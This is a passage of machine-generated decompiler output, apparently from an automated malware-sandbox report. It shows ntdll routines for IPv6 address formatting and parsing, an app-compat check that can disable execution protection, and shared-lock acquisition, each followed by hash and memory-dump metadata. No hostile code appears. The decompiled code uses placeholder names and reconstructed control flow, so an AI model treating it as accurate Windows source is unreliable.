                                                                                                                                                        						_t104 = E0097894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
                                                                                                                                                        						goto L12;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t117 != 0xffff) {
                                                                                                                                                        						goto L13;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t117 != 0) {
                                                                                                                                                        						_t106 = 0x8c9cac;
                                                                                                                                                        						goto L11;
                                                                                                                                                        					}
                                                                                                                                                        					goto L9;
                                                                                                                                                        				}
                                                                                                                                                        			}





















                                                                                                                                                        0x00963cef
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963ce8
                                                                                                                                                        0x00963d67
                                                                                                                                                        0x00963d6b
                                                                                                                                                        0x00963d74
                                                                                                                                                        0x00963d79
                                                                                                                                                        0x00963d7e
                                                                                                                                                        0x00963d95
                                                                                                                                                        0x00963d95
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963d98
                                                                                                                                                        0x00963ca1
                                                                                                                                                        0x00963ca3
                                                                                                                                                        0x00963ca4
                                                                                                                                                        0x00963ca6
                                                                                                                                                        0x00963ca9
                                                                                                                                                        0x00963cac
                                                                                                                                                        0x00963cea
                                                                                                                                                        0x00963cae
                                                                                                                                                        0x00963cbb
                                                                                                                                                        0x00963cc0
                                                                                                                                                        0x00963cc3
                                                                                                                                                        0x00963cc3
                                                                                                                                                        0x00963cc6
                                                                                                                                                        0x00963cc6
                                                                                                                                                        0x00963cc9
                                                                                                                                                        0x00963cca
                                                                                                                                                        0x00963ccb
                                                                                                                                                        0x00963ccb
                                                                                                                                                        0x00963ccb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963ca9
                                                                                                                                                        0x00963bdc
                                                                                                                                                        0x00963bdc
                                                                                                                                                        0x00963be8
                                                                                                                                                        0x00963c3c
                                                                                                                                                        0x00963c3f
                                                                                                                                                        0x00963c72
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c48
                                                                                                                                                        0x00963c4f
                                                                                                                                                        0x00963c54
                                                                                                                                                        0x00963c59
                                                                                                                                                        0x00963c68
                                                                                                                                                        0x00963c34
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c34
                                                                                                                                                        0x00963c3f
                                                                                                                                                        0x00963bea
                                                                                                                                                        0x00963bf1
                                                                                                                                                        0x00963bff
                                                                                                                                                        0x00963bff
                                                                                                                                                        0x00963c0b
                                                                                                                                                        0x00963c12
                                                                                                                                                        0x00963c17
                                                                                                                                                        0x00963c1c
                                                                                                                                                        0x00963c21
                                                                                                                                                        0x00963c2c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c31
                                                                                                                                                        0x00963bf8
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963bfd
                                                                                                                                                        0x00963c06
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963c06
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00963bfd

                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                                                        • Opcode ID: e014411330255e1b113d43c175c767ee0ed7b1b537dd10ee821f23b52bc34867
                                                                                                                                                        • Instruction ID: 01eb52d91fdde9579a550a7b4e54692aa0eb68c0c4f9e87fc45f535725a4b22a
                                                                                                                                                        • Opcode Fuzzy Hash: e014411330255e1b113d43c175c767ee0ed7b1b537dd10ee821f23b52bc34867
                                                                                                                                                        • Instruction Fuzzy Hash: D8619176900648ABCB20DFA9C8519BE7BF9EF94310B14C56AFCED97541E238EB409B50
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                        			E008F7EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				char _v540;
                                                                                                                                                        				unsigned int _v544;
                                                                                                                                                        				signed int _v548;
                                                                                                                                                        				intOrPtr _v552;
                                                                                                                                                        				char _v556;
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int _t33;
                                                                                                                                                        				void* _t38;
                                                                                                                                                        				unsigned int _t46;
                                                                                                                                                        				unsigned int _t47;
                                                                                                                                                        				unsigned int _t52;
                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                        				unsigned int _t62;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				void* _t70;
                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                        				signed int _t73;
                                                                                                                                                        				void* _t74;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				void* _t76;
                                                                                                                                                        				void* _t77;
                                                                                                                                                        
                                                                                                                                                        				_t33 =  *0x9a2088; // 0x7779c78d
                                                                                                                                                        				_v8 = _t33 ^ _t73;
                                                                                                                                                        				_v548 = _v548 & 0x00000000;
                                                                                                                                                        				_t72 = _a4;
                                                                                                                                                        				if(E008F7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                        					__eflags = _v548;
                                                                                                                                                        					if(_v548 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t62 = _t72 + 0x24;
                                                                                                                                                        					E00913F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                                                                                        					_t71 = 0x214;
                                                                                                                                                        					_v544 = 0x214;
                                                                                                                                                        					E008CDFC0( &_v540, 0, 0x214);
                                                                                                                                                        					_t75 = _t74 + 0x20;
                                                                                                                                                        					_t46 =  *0x9a4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                                                                                        					__eflags = _t46;
                                                                                                                                                        					if(_t46 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_t47 = _v544;
                                                                                                                                                        					__eflags = _t47;
                                                                                                                                                        					if(_t47 == 0) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					__eflags = _t47 - 0x214;
                                                                                                                                                        					if(_t47 >= 0x214) {
                                                                                                                                                        						goto L1;
                                                                                                                                                        					}
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                                                                                        					E00913F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                                                                                        					_t52 = E008D0D27( &_v540, L"Execute=1");
                                                                                                                                                        					_t76 = _t75 + 0x1c;
                                                                                                                                                        					_push(_t62);
                                                                                                                                                        					__eflags = _t52;
                                                                                                                                                        					if(_t52 == 0) {
                                                                                                                                                        						E00913F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                                                                                        						_t71 =  &_v540;
                                                                                                                                                        						_t56 = _t73 + _v544 - 0x218;
                                                                                                                                                        						_t77 = _t76 + 0x14;
                                                                                                                                                        						_v552 = _t56;
                                                                                                                                                        						__eflags = _t71 - _t56;
                                                                                                                                                        						if(_t71 >= _t56) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						} else {
                                                                                                                                                        							goto L10;
                                                                                                                                                        						}
                                                                                                                                                        						while(1) {
                                                                                                                                                        							L10:
                                                                                                                                                        							_t62 = E008D8375(_t71, 0x20);
                                                                                                                                                        							_pop(_t69);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								 *_t62 = 0;
                                                                                                                                                        							}
                                                                                                                                                        							E00913F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                                                                                                                        							_t77 = _t77 + 0x10;
                                                                                                                                                        							E0093E8DB(_t69, _t70, __eflags, _t72, _t71);
                                                                                                                                                        							__eflags = _t62;
                                                                                                                                                        							if(_t62 == 0) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        							_t31 = _t62 + 2; // 0x2
                                                                                                                                                        							_t71 = _t31;
                                                                                                                                                        							__eflags = _t71 - _v552;
                                                                                                                                                        							if(_t71 >= _v552) {
                                                                                                                                                        								goto L1;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                                                                                                                        					_push(3);
                                                                                                                                                        					_push(0x55);
                                                                                                                                                        					E00913F92();
                                                                                                                                                        					_t38 = 1;
                                                                                                                                                        					L2:
                                                                                                                                                        					return E008CE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t38 = 0;
                                                                                                                                                        				goto L2;
                                                                                                                                                        			}




























                                                                                                                                                        APIs
                                                                                                                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00913F12
                                                                                                                                                        Strings
                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0091E2FB
                                                                                                                                                        • ExecuteOptions, xrefs: 00913F04
                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00913F75
                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00913EC4
                                                                                                                                                        • Execute=1, xrefs: 00913F5E
                                                                                                                                                        • X'L, xrefs: 008F7F1E
                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00913F4A
                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 0091E345
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BaseDataModuleQuery
                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$X'L
                                                                                                                                                        • API String ID: 3901378454-2021664842
                                                                                                                                                        • Opcode ID: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
                                                                                                                                                        • Instruction ID: d6785467c0747741815115a6e70cceee07e207a6ec2b549953a9dbe8ff2c79af
                                                                                                                                                        • Opcode Fuzzy Hash: 587eb052462a409617d44b0b7c4cea4380ff929dee154fb6fa9d0afda70bf443
                                                                                                                                                        • Instruction Fuzzy Hash: F2419971A4031C7AEF209AA4DCC6FEA73BCFF58700F0005A9B615E61C1EA70DA858B61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                        			E00900B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                        				signed int _v8;
                                                                                                                                                        				signed int _v12;
                                                                                                                                                        				signed int _v16;
                                                                                                                                                        				signed int _v20;
                                                                                                                                                        				signed int _v24;
                                                                                                                                                        				signed int _v28;
                                                                                                                                                        				signed int _v32;
                                                                                                                                                        				void* _t108;
                                                                                                                                                        				void* _t116;
                                                                                                                                                        				char _t120;
                                                                                                                                                        				short _t121;
                                                                                                                                                        				void* _t128;
                                                                                                                                                        				intOrPtr* _t130;
                                                                                                                                                        				char _t132;
                                                                                                                                                        				short _t133;
                                                                                                                                                        				intOrPtr _t141;
                                                                                                                                                        				signed int _t156;
                                                                                                                                                        				signed int _t174;
                                                                                                                                                        				intOrPtr _t177;
                                                                                                                                                        				intOrPtr* _t179;
                                                                                                                                                        				intOrPtr _t180;
                                                                                                                                                        				void* _t183;
                                                                                                                                                        
                                                                                                                                                        				_t179 = _a4;
                                                                                                                                                        				_t141 =  *_t179;
                                                                                                                                                        				_v16 = 0;
                                                                                                                                                        				_v28 = 0;
                                                                                                                                                        				_v8 = 0;
                                                                                                                                                        				_v24 = 0;
                                                                                                                                                        				_v12 = 0;
                                                                                                                                                        				_v32 = 0;
                                                                                                                                                        				_v20 = 0;
                                                                                                                                                        				if(_t141 == 0) {
                                                                                                                                                        					L41:
                                                                                                                                                        					 *_a8 = _t179;
                                                                                                                                                        					_t180 = _v24;
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_t180 != 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                        					}
                                                                                                                                                        					_t174 = _v32;
                                                                                                                                                        					if(_t174 == 0) {
                                                                                                                                                        						if(_v8 == 7) {
                                                                                                                                                        							goto L43;
                                                                                                                                                        						}
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					L43:
                                                                                                                                                        					if(_v16 != 1) {
                                                                                                                                                        						if(_v16 != 2) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        						L47:
                                                                                                                                                        						if(_t174 != 0) {
                                                                                                                                                        							E008D8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                        							_t116 = 8;
                                                                                                                                                        							E008CDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                        						}
                                                                                                                                                        						return 0;
                                                                                                                                                        					}
                                                                                                                                                        					if(_t180 != 0) {
                                                                                                                                                        						if(_v12 > 3) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						_t120 = E00900CFA(_v28, 0, 0xa);
                                                                                                                                                        						_t183 = _t183 + 0xc;
                                                                                                                                                        						if(_t120 > 0xff) {
                                                                                                                                                        							goto L6;
                                                                                                                                                        						}
                                                                                                                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                        						goto L47;
                                                                                                                                                        					}
                                                                                                                                                        					if(_v12 > 4) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					}
                                                                                                                                                        					_t121 = E00900CFA(_v28, _t180, 0x10);
                                                                                                                                                        					_t183 = _t183 + 0xc;
                                                                                                                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                        					goto L47;
                                                                                                                                                        				} else {
                                                                                                                                                        					while(1) {
                                                                                                                                                        						_t123 = _v16;
                                                                                                                                                        						if(_t123 == 0) {
                                                                                                                                                        							goto L7;
                                                                                                                                                        						}
                                                                                                                                                        						_t108 = _t123 - 1;
                                                                                                                                                        						if(_t108 != 0) {
                                                                                                                                                        							goto L1;
                                                                                                                                                        						}
                                                                                                                                                        						_t178 = _t141;
                                                                                                                                                        						if(E009006BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                        							if(E009006BA(_t135, _t178) == 0 || E00900A5B(_t136, _t178) == 0) {
                                                                                                                                                        								if(_t141 != 0x3a) {
                                                                                                                                                        									if(_t141 == 0x2e) {
                                                                                                                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										} else {
                                                                                                                                                        											_v24 = _v24 + 1;
                                                                                                                                                        											L27:
                                                                                                                                                        											_v16 = _v16 & 0x00000000;
                                                                                                                                                        											L28:
                                                                                                                                                        											if(_v28 == 0) {
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											_t177 = _v24;
                                                                                                                                                        											if(_t177 != 0) {
                                                                                                                                                        												if(_v12 > 3) {
                                                                                                                                                        													L6:
                                                                                                                                                        													return 0xc000000d;
                                                                                                                                                        												}
                                                                                                                                                        												_t132 = E00900CFA(_v28, 0, 0xa);
                                                                                                                                                        												_t183 = _t183 + 0xc;
                                                                                                                                                        												if(_t132 > 0xff) {
                                                                                                                                                        													goto L6;
                                                                                                                                                        												}
                                                                                                                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                        												goto L20;
                                                                                                                                                        											}
                                                                                                                                                        											if(_v12 > 4) {
                                                                                                                                                        												goto L6;
                                                                                                                                                        											}
                                                                                                                                                        											_t133 = E00900CFA(_v28, 0, 0x10);
                                                                                                                                                        											_t183 = _t183 + 0xc;
                                                                                                                                                        											_v20 = _v20 + 1;
                                                                                                                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                        											goto L20;
                                                                                                                                                        										}
                                                                                                                                                        									}
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								} else {
                                                                                                                                                        									_t130 = _t179 + 1;
                                                                                                                                                        									if( *_t130 == _t141) {
                                                                                                                                                        										if(_v32 != 0) {
                                                                                                                                                        											goto L41;
                                                                                                                                                        										}
                                                                                                                                                        										_v32 = _v8 + 1;
                                                                                                                                                        										_t156 = 2;
                                                                                                                                                        										_v8 = _v8 + _t156;
                                                                                                                                                        										L34:
                                                                                                                                                        										_t179 = _t130;
                                                                                                                                                        										_v16 = _t156;
                                                                                                                                                        										goto L28;
                                                                                                                                                        									}
                                                                                                                                                        									_v8 = _v8 + 1;
                                                                                                                                                        									goto L27;
                                                                                                                                                        								}
                                                                                                                                                        							} else {
                                                                                                                                                        								_v12 = _v12 + 1;
                                                                                                                                                        								if(_v24 > 0) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								goto L20;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_v12 = _v12 + 1;
                                                                                                                                                        							L20:
                                                                                                                                                        							_t179 = _t179 + 1;
                                                                                                                                                        							_t141 =  *_t179;
                                                                                                                                                        							if(_t141 == 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							}
                                                                                                                                                        							continue;
                                                                                                                                                        						}
                                                                                                                                                        						L7:
                                                                                                                                                        						if(_t141 == 0x3a) {
                                                                                                                                                        							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t130 = _t179 + 1;
                                                                                                                                                        								if( *_t130 != _t141) {
                                                                                                                                                        									goto L41;
                                                                                                                                                        								}
                                                                                                                                                        								_v20 = _v20 + 1;
                                                                                                                                                        								_t156 = 2;
                                                                                                                                                        								_v32 = 1;
                                                                                                                                                        								_v8 = _t156;
                                                                                                                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                        								goto L34;
                                                                                                                                                        							}
                                                                                                                                                        						}
                                                                                                                                                        						L8:
                                                                                                                                                        						if(_v8 > 7) {
                                                                                                                                                        							goto L41;
                                                                                                                                                        						}
                                                                                                                                                        						_t142 = _t141;
                                                                                                                                                        						if(E009006BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                        							if(E009006BA(_t124, _t142) == 0 || E00900A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                        								goto L41;
                                                                                                                                                        							} else {
                                                                                                                                                        								_t128 = 1;
                                                                                                                                                        								_a7 = 1;
                                                                                                                                                        								_v28 = _t179;
                                                                                                                                                        								_v16 = 1;
                                                                                                                                                        								_v12 = 1;
                                                                                                                                                        								L39:
                                                                                                                                                        								if(_v16 == _t128) {
                                                                                                                                                        									goto L20;
                                                                                                                                                        								}
                                                                                                                                                        								goto L28;
                                                                                                                                                        							}
                                                                                                                                                        						} else {
                                                                                                                                                        							_a7 = 0;
                                                                                                                                                        							_v28 = _t179;
                                                                                                                                                        							_v16 = 1;
                                                                                                                                                        							_v12 = 1;
                                                                                                                                                        							goto L20;
                                                                                                                                                        						}
                                                                                                                                                        					}
                                                                                                                                                        				}
                                                                                                                                                        				L1:
                                                                                                                                                        				_t123 = _t108 == 1;
                                                                                                                                                        				if(_t108 == 1) {
                                                                                                                                                        					goto L8;
                                                                                                                                                        				}
                                                                                                                                                        				_t128 = 1;
                                                                                                                                                        				goto L39;
                                                                                                                                                        			}


























                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2152022479.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                                        • Associated: 00000006.00000002.2152010678.00000000008A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152322375.0000000000990000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152327355.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152332352.00000000009A4000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152336391.00000000009A7000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152340781.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                        • Associated: 00000006.00000002.2152389742.0000000000A10000.00000040.00000001.sdmp
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID: .$:$:
                                                                                                                                                        • API String ID: 3965848254-2308638275
                                                                                                                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction ID: 759d062b201271faa9d41a037277465b0e31306e5b9c2d292e436fb1f884d6e6
                                                                                                                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                        • Instruction Fuzzy Hash: 2EA19D71D0031AEFEF24CF64C8457BEB7B9AF95704F24856AD882A72C1D7349A41CB52
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                        			E00900554(signed int _a4, char _a8) {
                                                                                                                                                        				void* __ebx;
                                                                                                                                                        				void* __edi;
                                                                                                                                                        				void* __esi;
                                                                                                                                                        				signed int* _t49;
                                                                                                                                                        				signed int _t51;
                                                                                                                                                        				signed int _t56;
                                                                                                                                                        				signed int _t58;
                                                                                                                                                        				signed int _t61;
                                                                                                                                                        				signed int _t63;
                                                                                                                                                        				void* _t66;
                                                                                                                                                        				intOrPtr _t67;
                                                                                                                                                        				void* _t69;
                                                                                                                                                        				signed int _t70;
                                                                                                                                                        				void* _t75;
                                                                                                                                                        				signed int _t81;
                                                                                                                                                        				signed int _t84;
                                                                                                                                                        				void* _t86;
                                                                                                                                                        				signed int _t93;
                                                                                                                                                        				signed int _t96;
                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                        				signed int _t107;
                                                                                                                                                        				void* _t110;
                                                                                                                                                        				signed int _t115;
                                                                                                                                                        				signed int* _t119;
                                                                                                                                                        				void* _t125;
                                                                                                                                                        				void* _t126;
                                                                                                                                                        				signed int _t128;
                                                                                                                                                        				signed int _t130;
                                                                                                                                                        				signed int _t138;
                                                                                                                                                        				signed int _t144;
                                                                                                                                                        				void* _t158;
                                                                                                                                                        				void* _t159;
                                                                                                                                                        				void* _t160;
                                                                                                                                                        
                                                                                                                                                        				_t96 = _a4;
                                                                                                                                                        				_t115 =  *(_t96 + 0x28);
                                                                                                                                                        				_push(_t138);
                                                                                                                                                        				if(_t115 < 0) {
                                                                                                                                                        					_t105 =  *[fs:0x18];
                                                                                                                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                        						goto L6;
                                                                                                                                                        					} else {
                                                                                                                                                        						__eflags = _t115 | 0xffffffff;
                                                                                                                                                        						asm("lock xadd [eax], edx");
                                                                                                                                                        						return 1;
                                                                                                                                                        					}
                                                                                                                                                        				} else {
                                                                                                                                                        					L6:
                                                                                                                                                        					_push(_t128);
                                                                                                                                                        					while(1) {
                                                                                                                                                        						L7:
                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                        						if(_t115 >= 0) {
                                                                                                                                                        							break;
                                                                                                                                                        						}
                                                                                                                                                        						__eflags = _a8;
                                                                                                                                                        						if(_a8 == 0) {
                                                                                                                                                        							__eflags = 0;
                                                                                                                                                        							return 0;
                                                                                                                                                        						} else {
                                                                                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        							_t49 = _t96 + 0x1c;
                                                                                                                                                        							_t106 = 1;
                                                                                                                                                        							asm("lock xadd [edx], ecx");
                                                                                                                                                        							_t115 =  *(_t96 + 0x28);
                                                                                                                                                        							__eflags = _t115;
                                                                                                                                                        							if(_t115 < 0) {
                                                                                                                                                        								L23:
                                                                                                                                                        								_t130 = 0;
                                                                                                                                                        								__eflags = 0;
                                                                                                                                                        								while(1) {
                                                                                                                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                        									asm("sbb esi, esi");
                                                                                                                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009a01c0;
                                                                                                                                                        									_push(_t144);
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_t51 = E008BF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                        									__eflags = _t51 - 0x102;
                                                                                                                                                        									if(_t51 != 0x102) {
                                                                                                                                                        										break;
                                                                                                                                                        									}
                                                                                                                                                        									_t106 =  *(_t144 + 4);
                                                                                                                                                        									_t126 =  *_t144;
                                                                                                                                                        									_t86 = E00904FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                        									_push(_t126);
                                                                                                                                                        									_push(_t86);
                                                                                                                                                        									E00913F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                        									E00913F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                        									_t130 = _t130 + 1;
                                                                                                                                                        									_t160 = _t158 + 0x28;
                                                                                                                                                        									__eflags = _t130 - 2;
                                                                                                                                                        									if(__eflags > 0) {
                                                                                                                                                        										E0094217A(_t106, __eflags, _t96);
                                                                                                                                                        									}
                                                                                                                                                        									_push("RTL: Re-Waiting\n");
                                                                                                                                                        									_push(0);
                                                                                                                                                        									_push(0x65);
                                                                                                                                                        									E00913F92();
                                                                                                                                                        									_t158 = _t160 + 0xc;
                                                                                                                                                        								}
                                                                                                                                                        								__eflags = _t51;
                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                        									_push(_t51);
                                                                                                                                                        									E00903915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                        									asm("int3");
                                                                                                                                                        									while(1) {
                                                                                                                                                        										L32:
                                                                                                                                                        										__eflags = _a8;
                                                                                                                                                        										if(_a8 == 0) {
                                                                                                                                                        											break;
                                                                                                                                                        										}
                                                                                                                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                        										_t119 = _t96 + 0x24;
                                                                                                                                                        										_t107 = 1;
                                                                                                                                                        										asm("lock xadd [eax], ecx");
                                                                                                                                                        										_t56 =  *(_t96 + 0x28);
                                                                                                                                                        										_a4 = _t56;
